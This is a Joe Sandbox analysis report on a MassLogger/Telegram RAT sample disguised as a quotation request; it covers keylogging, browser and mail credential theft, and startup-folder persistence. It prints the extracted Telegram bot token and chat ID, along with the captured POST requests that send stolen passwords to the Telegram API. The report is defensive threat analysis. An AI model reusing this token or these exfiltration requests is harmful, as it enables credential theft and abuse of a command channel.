Edit tour

Windows Analysis Report
QUOTATION REQUEST - BQS058.exe

Overview

General Information

Sample name:	QUOTATION REQUEST - BQS058.exe
Analysis ID:	1576113
MD5:	29fa7717196e21c8a1f9c7c5b8883f77
SHA1:	863c0d428d4053e9026e43412cf4c8487a3301c4
SHA256:	b1d0cb05942924fcab68c6578fbbc11c6a6e16a9b91c180b99a67d291de090f1
Tags:	exeuser-James_inthe_box
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected MassLogger RAT

Yara detected Telegram RAT

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION REQUEST - BQS058.exe (PID: 3876 cmdline: "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe" MD5: 29FA7717196E21C8A1F9C7C5B8883F77)

nonplacental.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe" MD5: 29FA7717196E21C8A1F9C7C5B8883F77)

RegSvcs.exe (PID: 432 cmdline: "C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 2820 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

nonplacental.exe (PID: 6508 cmdline: "C:\Users\user\AppData\Local\Allene\nonplacental.exe" MD5: 29FA7717196E21C8A1F9C7C5B8883F77)

RegSvcs.exe (PID: 4424 cmdline: "C:\Users\user\AppData\Local\Allene\nonplacental.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg", "Telegram Chatid": "5267093791"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xef73:$a1: get_encryptedPassword 0xf29b:$a2: get_encryptedUsername 0xed0e:$a3: get_timePasswordChanged 0xee2f:$a4: get_passwordField 0xef89:$a5: set_encryptedPassword 0x108e5:$a7: get_logins 0x10596:$a8: GetOutlookPasswords 0x10388:$a9: StartKeylogger 0x10835:$a10: KeyLoggerEventArgs 0x103e5:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
Process Memory Space: nonplacental.exe PID: 2608	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: nonplacental.exe PID: 2608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nonplacental.exe PID: 2608	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nonplacental.exe PID: 2608	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1e9e29:$a1: get_encryptedPassword 0x1ea142:$a2: get_encryptedUsername 0x1e9bd8:$a3: get_timePasswordChanged 0x1e9cf9:$a4: get_passwordField 0x1e9e3f:$a5: set_encryptedPassword 0x1eb742:$a7: get_logins 0x1eb3f3:$a8: GetOutlookPasswords 0x1eb1e5:$a9: StartKeylogger 0x1eb692:$a10: KeyLoggerEventArgs 0x1eb242:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 432	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 432	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 432	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x61b0:$a1: get_encryptedPassword 0x64c9:$a2: get_encryptedUsername 0x5f5f:$a3: get_timePasswordChanged 0x6080:$a4: get_passwordField 0x61c6:$a5: set_encryptedPassword 0x7ac9:$a7: get_logins 0x777a:$a8: GetOutlookPasswords 0x756c:$a9: StartKeylogger 0x7a19:$a10: KeyLoggerEventArgs 0x75c9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: nonplacental.exe PID: 6508	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: nonplacental.exe PID: 6508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nonplacental.exe PID: 6508	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: nonplacental.exe PID: 6508	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c267:$a1: get_encryptedPassword 0x12c580:$a2: get_encryptedUsername 0x12c016:$a3: get_timePasswordChanged 0x12c137:$a4: get_passwordField 0x12c27d:$a5: set_encryptedPassword 0x12db80:$a7: get_logins 0x12d831:$a8: GetOutlookPasswords 0x12d623:$a9: StartKeylogger 0x12dad0:$a10: KeyLoggerEventArgs 0x12d680:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 4424	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4424	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.nonplacental.exe.1d10000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.nonplacental.exe.1d10000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.nonplacental.exe.1d10000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.nonplacental.exe.1d10000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
5.2.nonplacental.exe.1d10000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
5.2.nonplacental.exe.1d10000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.nonplacental.exe.1d10000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.nonplacental.exe.1d10000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.nonplacental.exe.1d10000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd373:$a1: get_encryptedPassword 0xd69b:$a2: get_encryptedUsername 0xd10e:$a3: get_timePasswordChanged 0xd22f:$a4: get_passwordField 0xd389:$a5: set_encryptedPassword 0xece5:$a7: get_logins 0xe996:$a8: GetOutlookPasswords 0xe788:$a9: StartKeylogger 0xec35:$a10: KeyLoggerEventArgs 0xe7e5:$a11: KeyLoggerEventArgsEventHandler
5.2.nonplacental.exe.1d10000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12325:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11823:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b31:$a4: \Orbitum\User Data\Default\Login Data 0x12929:$a5: \Kometa\User Data\Default\Login Data
2.2.nonplacental.exe.2060000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.nonplacental.exe.2060000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.nonplacental.exe.2060000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.nonplacental.exe.2060000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
2.2.nonplacental.exe.2060000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
2.2.nonplacental.exe.2060000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.nonplacental.exe.2060000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.nonplacental.exe.2060000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.nonplacental.exe.2060000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd373:$a1: get_encryptedPassword 0xd69b:$a2: get_encryptedUsername 0xd10e:$a3: get_timePasswordChanged 0xd22f:$a4: get_passwordField 0xd389:$a5: set_encryptedPassword 0xece5:$a7: get_logins 0xe996:$a8: GetOutlookPasswords 0xe788:$a9: StartKeylogger 0xec35:$a10: KeyLoggerEventArgs 0xe7e5:$a11: KeyLoggerEventArgsEventHandler
2.2.nonplacental.exe.2060000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12325:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11823:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b31:$a4: \Orbitum\User Data\Default\Login Data 0x12929:$a5: \Kometa\User Data\Default\Login Data
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , ProcessId: 2820, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" , ProcessId: 2820, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Allene\nonplacental.exe, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T15:00:25.667261+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49707	149.154.167.220	443	TCP
2024-12-16T15:00:36.969725+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49731	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T15:00:15.718231+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	193.122.6.168	80	TCP
2024-12-16T15:00:23.484007+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	193.122.6.168	80	TCP
2024-12-16T15:00:27.655736+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	193.122.6.168	80	TCP
2024-12-16T15:00:34.890125+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg", "Telegram Chatid": "5267093791"}
Source: RegSvcs.exe.4424.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: QUOTATION REQUEST - BQS058.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: QUOTATION REQUEST - BQS058.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: QUOTATION REQUEST - BQS058.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49712 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49731 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: nonplacental.exe, 00000002.00000003.2111868829.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2111211114.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237143101.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237482817.0000000003990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: nonplacental.exe, 00000002.00000003.2111868829.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2111211114.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237143101.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2237482817.0000000003990000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0103445A
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0103C75C
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103C6D1 FindFirstFileW,FindClose,	0_2_0103C6D1
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0103EF95
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0103F0F2
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0103F3F3
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_010337EF
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01033B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_01033B12
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0103BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0103BCBC
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_002E445A
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EC6D1 FindFirstFileW,FindClose,	2_2_002EC6D1
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_002EC75C
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_002EEF95
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_002EF0F2
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_002EF3F3
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_002E37EF
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_002E3B12
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_002EBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49731 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49707 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267093791&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1db012dc04f6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267093791&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1db019aa611fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

